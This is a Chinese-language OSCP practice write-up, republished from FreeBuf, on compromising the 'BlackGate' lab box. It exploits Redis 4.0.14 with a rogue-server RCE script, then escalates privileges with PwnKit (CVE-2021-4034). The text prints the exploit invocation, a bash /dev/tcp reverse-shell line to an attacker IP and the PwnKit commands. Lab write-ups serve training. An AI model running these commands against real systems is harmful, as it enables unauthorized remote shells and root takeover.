OSCP靶场66--BlackGate(PG)
文章描述了一个攻击链过程:通过信息收集利用Redis 4.0.14 RCE漏洞提权。尝试了多种方式搜索工具和脚本,在多次尝试后使用GitHub上的两个脚本成功反弹shell并提权。过程中遇到搜索效率低、工具使用不熟练等问题。 2025-11-2 07:36:41 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

端口信息收集---按照版本搜索EXP---利用---使用linpeas找到通用提权漏洞---完成提权

难度

中等

知识点

Redis key-value store 4.0.14 RCE漏洞

过程

信息收集

1761981761_6905b541446b34f09b960.png!small?1761981761634

突破边界

6379redis应该是这个靶机的考点。我exploit搜索了关键词对应的漏洞。没有利用成功。

1761981957_6905b605e5bc1da542add.png!small?1761981959006

我认为红框部分的两个漏洞是最有可能性的,但是都没利用成功,不排除我msf用错了。此处按下不表。先写其他方法。接着,我也不知道其他人是怎么知道用以下这个脚本的。。

难点是要正好搜到WP上用的工具并正确使用,但是我基本每次都搜不到,要么就用错了,要么放弃了正确的路线要么在错误的路线上反复尝试。这里应该搞清楚如何最高效率的搜索并筛选信息。

1761983282_6905bb32f3f6a36d03f29.png!small?1761983283526

在无redis知识前提下,显然,此处要用的是redis的RCE。

1761983329_6905bb61aa9a0670052df.png!small?1761983330141

有个RCE,底下提供了msf的利用步骤。试试看,

1761988188_6905ce5c5ea0cbd81f102.png!small?1761988188927

1761988241_6905ce919e54d8159ea65.png!small?1761988242211

没这个模块,换一个利用,

1761988830_6905d0de175cca1b5646a.png!small?1761988830619

1761989916_6905d51ce47740ea95f00.png!small?1761989917682

访问权限拒绝。显然,那俩漏洞对应的msf模块的

exploit/linux/redis/redis_replication_cmd_exec                                         2018-11-13       good

1761989957_6905d545f0d9c5282d07d.png!small?1761989958318

考试不让用AI,所以我的判断方法是:找了一下msf的search结果,没有其他的可用的or和这俩漏洞相近的。

exploitdb搜索不成就用谷歌搜索。

1762064695_6906f937a9ff50bbd1bb5.png!small?1762064696492

有的exp只提供脚本,运行时需要的文件还得找半天,倾向使用直接能用或者附带所需文件的脚本,节约时间。

第一个能用的脚本

https://github.com/jas502n/Redis-RCE

1762065265_6906fb71d115a9bff2005.png!small?1762065266435

我其实不知道其他WP是怎么忽然就能用对脚本的,我认为应该提供一个可实行的路径,在没有任何提示的时候是能找到正确的用。

第二个能用的脚本

https://github.com/n0b0dyCN/redis-rogue-server?source=post_page-----49920d4188de---------------------------------------

1762066535_69070067292f0e3529fd4.png!small?1762066537380

不一样的是,其他WP在用了这个脚本以后,会弹出这种提示,

1762066685_690700fd3cde018446348.png!small?1762066686051

我不知道我的为啥没有,但是我可以直接用反弹shell连接回去:

python redis-rogue-server.py --rhost 192.168.249.176 --lhost 192.168.45.152

/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.152/4444 0>&1'

1762066882_690701c211052a8d4a000.png!small?1762066883127

1762066851_690701a38414fbebfba2b.png!small?1762066852146

提权

运行linpeas.sh,可尝试用PwnKit

https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit

./cve-2021-4034.sh

./pwnkit

直接下载过去,然后运行里边的sh脚本就行了。

1762068246_690707161e15ee7894627.png!small?1762068246944

官方WP的提权手段涉及逆向,考试不考逆向,此处不分析。

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/455312.html
如有侵权请联系:admin#unsafe.sh